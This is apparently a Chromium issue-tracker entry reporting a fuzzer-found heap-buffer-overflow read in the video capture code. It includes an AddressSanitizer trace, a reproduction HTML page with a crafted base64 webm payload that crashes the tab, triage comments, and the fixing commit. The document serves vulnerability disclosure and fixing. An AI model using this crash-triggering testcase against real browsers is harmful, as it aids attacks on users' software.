Issue metadata
Sign in to add a comment
|
Security: heap-buffer-overflow READ in content::HtmlVideoElementCapturerSource::sendNewFrame
Reported by
cloudfuz...@gmail.com,
Sep 5 2017
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The testcase crashes the latest ASAN build of content_shell as follows:
=================================================================
==23233==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000775b4 at pc 0x560e858ada85 bp 0x7fffb4cc6cd0 sp 0x7fffb4cc6480
READ of size 8 at 0x6020000775b4 thread T0 (chrome)
#0 0x560e858ada84 in __asan_memcpy (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3214a84)
#1 0x560e8f293f37 in ARGBToUVRow_Any_AVX2 third_party/libyuv/source/row_any.cc:964:1
#2 0x560e8f27cb21 in ARGBToI420 third_party/libyuv/source/convert.cc:616:5
#3 0x560e9854ec40 in ConvertToI420 third_party/libyuv/source/convert_to_i420.cc:129:11
#4 0x560e9687575d in content::HtmlVideoElementCapturerSource::sendNewFrame() content/renderer/media_capture_from_element/html_video_element_capturer_source.cc:154:7
#5 0x560e8c3cf030 in Run base/callback.h:64:12
#6 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
#7 0x560e8b274cdd in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, bool, blink::scheduler::LazyNow, base::TimeTicks*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:515:19
#8 0x560e8b26e9ad in blink::scheduler::TaskQueueManager::DoWork(bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:312:13
#9 0x560e8c3cf030 in Run base/callback.h:64:12
#10 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
#11 0x560e8c4419b2 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:406:25
#12 0x560e8c443718 in DeferOrRunPendingTask base/message_loop/message_loop.cc:417:5
#13 0x560e8c443718 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:524
#14 0x560e8c448d0f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:33:31
#15 0x560e8c4cc929 in base::RunLoop::Run() base/run_loop.cc:123:14
#16 0x560e966f136e in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:220:23
#17 0x560e8b703990 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:354:14
#18 0x560e8b7077fa in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:709:12
#19 0x560e8b72a08a in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:469:29
#20 0x560e8b703044 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#21 0x560e858da497 in ChromeMain chrome/app/chrome_main.cc:122:12
#22 0x7f44c710b82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
0x6020000775b4 is located 0 bytes to the right of 4-byte region [0x6020000775b0,0x6020000775b4)
allocated by thread T0 (chrome) here:
#0 0x560e858ae853 in __interceptor_malloc (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3215853)
#1 0x560e8c4b5060 in base::UncheckedMalloc(unsigned long, void**) base/process/memory_linux.cc:104:13
#2 0x560e8c711f1b in sk_malloc_nothrow skia/ext/SkMemory_new_handler.cpp:75:19
#3 0x560e8c711f1b in sk_malloc_flags(unsigned long, unsigned int) skia/ext/SkMemory_new_handler.cpp:87
#4 0x560e8c7e2e15 in operator() third_party/skia/src/core/SkMallocPixelRef.cpp:79:55
#5 0x560e8c7e2e15 in __invoke third_party/skia/src/core/SkMallocPixelRef.cpp:79
#6 0x560e8c7e2e15 in MakeUsing third_party/skia/src/core/SkMallocPixelRef.cpp:68
#7 0x560e8c7e2e15 in SkMallocPixelRef::MakeAllocate(SkImageInfo const&, unsigned long) third_party/skia/src/core/SkMallocPixelRef.cpp:80
#8 0x560e8c71cfcb in SkBitmap::tryAllocPixels(SkImageInfo const&, unsigned long) third_party/skia/src/core/SkBitmap.cpp:251:28
#9 0x560e9687485f in tryAllocPixels third_party/skia/include/core/SkBitmap.h:269:22
#10 0x560e9687485f in content::HtmlVideoElementCapturerSource::StartCapture(media::VideoCaptureParams const&, base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&, base::RepeatingCallback<void (bool)> const&) content/renderer/media_capture_from_element/html_video_element_capturer_source.cc:88
#11 0x560e967b201c in content::MediaStreamVideoCapturerSource::StartSourceImpl(base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&) content/renderer/media/media_stream_video_capturer_source.cc:208:12
#12 0x560e967b50cc in content::MediaStreamVideoSource::AddTrack(content::MediaStreamVideoTrack*, content::VideoTrackAdapterSettings const&, base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&) content/renderer/media/media_stream_video_source.cc:64:7
#13 0x560e967bc0ef in content::MediaStreamVideoTrack::MediaStreamVideoTrack(content::MediaStreamVideoSource*, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&, bool) content/renderer/media/media_stream_video_track.cc:253:11
#14 0x560e967bb732 in content::MediaStreamVideoTrack::CreateVideoTrack(content::MediaStreamVideoSource*, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&, bool) content/renderer/media/media_stream_video_track.cc:210:26
#15 0x560e9653cf20 in content::AddVideoTrackToMediaStream(std::__1::unique_ptr<media::VideoCapturerSource, std::__1::default_delete<media::VideoCapturerSource> >, bool, blink::WebMediaStream*) content/public/renderer/media_stream_utils.cc:46:30
#16 0x560e966e17b7 in content::RendererBlinkPlatformImpl::CreateHTMLVideoElementCapturer(blink::WebMediaStream*, blink::WebMediaPlayer*) content/renderer/renderer_blink_platform_impl.cc:931:3
#17 0x560e9c578d68 in blink::(anonymous namespace)::MediaElementEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/WebKit/Source/modules/mediacapturefromelement/HTMLMediaElementCapture.cpp:72:26
#18 0x560e94961b1c in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/WebKit/Source/core/dom/events/EventTarget.cpp:760:15
#19 0x560e9495f764 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/WebKit/Source/core/dom/events/EventTarget.cpp:621:29
#20 0x560e9ad8d253 in blink::Node::HandleLocalEvents(blink::Event&) third_party/WebKit/Source/core/dom/Node.cpp:2177:3
#21 0x560e94c9501b in blink::NodeEventContext::HandleLocalEvents(blink::Event&) const third_party/WebKit/Source/core/events/NodeEventContext.cpp:63:10
#22 0x560e9493bddc in DispatchEventAtTarget third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:236:29
#23 0x560e9493bddc in blink::EventDispatcher::Dispatch() third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:182
#24 0x560e94939695 in blink::EventDispatcher::DispatchEvent(blink::Node&, blink::EventDispatchMediator*) third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:59:20
#25 0x560e9d4fdead in blink::MediaElementEventQueue::TimerFired(blink::TimerBase*) third_party/WebKit/Source/core/dom/events/MediaElementEventQueue.cpp:108:13
#26 0x560e9453020e in blink::TimerBase::RunInternal() third_party/WebKit/Source/platform/Timer.cpp:174:3
#27 0x560e8c3cf030 in Run base/callback.h:64:12
#28 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
#29 0x560e8b274cdd in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, bool, blink::scheduler::LazyNow, base::TimeTicks*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:515:19
#30 0x560e8b26e9ad in blink::scheduler::TaskQueueManager::DoWork(bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:312:13
#31 0x560e8c3cf030 in Run base/callback.h:64:12
#32 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
#33 0x560e8c4419b2 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:406:25
#34 0x560e8c443718 in DeferOrRunPendingTask base/message_loop/message_loop.cc:417:5
#35 0x560e8c443718 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:524
#36 0x560e8c448d0f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:33:31
#37 0x560e8c4cc929 in base::RunLoop::Run() base/run_loop.cc:123:14
#38 0x560e966f136e in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:220:23
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3214a84) in __asan_memcpy
Shadow bytes around the buggy address:
0x0c0480006e60: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x0c0480006e70: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 fa
0x0c0480006e80: fa fa fd fa fa fa fd fa fa fa 00 03 fa fa fd fa
0x0c0480006e90: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c0480006ea0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa 00 fa
=>0x0c0480006eb0: fa fa 00 fa fa fa[04]fa fa fa fd fd fa fa fd fd
0x0c0480006ec0: fa fa 00 fa fa fa fd fd fa fa 00 00 fa fa fd fa
0x0c0480006ed0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
0x0c0480006ee0: fa fa fd fd fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c0480006ef0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c0480006f00: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==23233==ABORTING
VERSION
Chrome Version: asan-linux-release-499408
Operating System: Linux
REPRODUCTION CASE
<script>
function start() {
try{o78=document.createElementNS('http://www.w3.org/1999/xhtml','video')}catch(e){};undefined;
try{o78['captureStream'](14)}catch(e){};undefined;
o78.setAttribute('src',"data:video/webm;base64,GkXfowEAAAAAAAAfQoaBAUL3gQFC8oEEQvOBCEKChHdlYm1Ch4ECQoWBAhhTgGcBAAAAAAACfhFNm3RALE27i1OrhBVJqWZTrIHfTbuMU6uEFlSua1OsggEwTbuMU6uEHFO7a1OsggJh7AEAAAAAAACkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVSalmAQAAAAAAAEUq17GDD0JATYCNTGF2ZjU2LjQwLjEwMVdBjUxhdmY1Ni40MC4xMDFzpJAI9vs3HzFdyEBxXtVbMzM0RImIQJdwAAAAAAAWVK5rAQAAAAAAADuuAQAAAAAAADLXgQFzxYEBnIEAIrWcg3VuZIaFVl9WUDmDgQEj44OEDuaygOABAAAAAAAABrCBAbqBAR9DtnUBAAAAAAAA3ueBAKOmgQAAgKJJg0IAAAAAAMAHBIODCoAABAAAEb//+UIU3iZw//Z8AACjxIEA+gCkAIBJegCGwAAGIAAAALn///wyA/////7OSv///y4AAKYAQJacAExAAAMgAAAc//+AD////+bR///nIADBIBzBo5uBAfQApgBAlpwATcAAAyAAAAD8//4WX/5f8KCjoIEC7gCmAECWnABNgAADIAAAALn+eD///98F////TgAAo5OBA+gApgEAlpwATWAAAyAAAF5Yo5eBBOIApgBBDpwATSAAAyAAADTN/8gAABxTu2sBAAAAAAAAEbuPs4EAt4r3gQHxggF38IED");
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
,
Sep 6 2017
Detailed report: https://clusterfuzz.com/testcase?key=5006920141504512 Job Type: linux_asan_chrome_mp Crash Type: Heap-buffer-overflow READ 8 Crash Address: 0x6090001ddce4 Crash State: ARGBToUVRow_Any_SSSE3 ARGBToI420 ConvertToI420 Sanitizer: address (ASAN) Recommended Security Severity: Medium Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=490547:490630 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5006920141504512 See https://github.com/google/clusterfuzz-tools for more information. A recommended severity was added to this bug. Please change the severity if it is inaccurate.
,
Sep 6 2017
,
Sep 6 2017
mcasas -- Can you take a look? The test case uses captureStream, and your CL enabling it (https://chromium-review.googlesource.com/c/chromium/src/+/544899) is in the regression range. The bug may also be in /third_party/libyuv.
,
Sep 6 2017
nparker@ I won't have time for this any time soon, assinging to niklase@ for triaging and adding chfremer@ FYI.
,
Sep 7 2017
,
Sep 11 2017
,
Sep 12 2017
ClusterFuzz testcase 5006920141504512 is flaky and no longer crashes, so closing issue. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
,
Sep 12 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/73f0459407c140d354ca3fc980ae17da286b0087 commit 73f0459407c140d354ca3fc980ae17da286b0087 Author: Emircan Uysaler <emircan@chromium.org> Date: Tue Sep 12 15:18:33 2017 Fix sizes used for conversion in HTMLVideoElementCapturerSource Bug: 730365, 762110 Change-Id: I6a7c090385bc595171b82f73ba53635b1623b210 Reviewed-on: https://chromium-review.googlesource.com/634463 Reviewed-by: Miguel Casas <mcasas@chromium.org> Commit-Queue: Miguel Casas <mcasas@chromium.org> Cr-Commit-Position: refs/heads/master@{#501280} [modify] https://crrev.com/73f0459407c140d354ca3fc980ae17da286b0087/content/renderer/media_capture_from_element/html_video_element_capturer_source.cc
,
Dec 19 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Sep 5 2017